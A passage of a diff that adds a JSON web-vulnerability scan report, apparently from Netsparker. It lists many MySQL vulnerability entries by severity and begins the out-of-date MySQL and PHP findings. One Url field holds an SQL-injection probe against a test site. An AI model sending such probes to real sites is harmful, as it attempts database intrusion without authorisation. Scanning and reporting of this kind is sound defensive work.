"MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Access Control Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Critical", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Critical", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Improper Neutralization of Special Elements used in a Command ('Command Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Privilege Management Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Access Control Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + } + ], + "LastSeenDate": "25/06/2021 01:54 AM", + "Name": "Out-of-date Version (MySQL)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Please upgrade your installation of MySQL to the latest stable version.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Revived", + "Type": "MySqlOutOfDate", + "Url": "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "C1", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise identified you are using an out-of-date version of PHP.

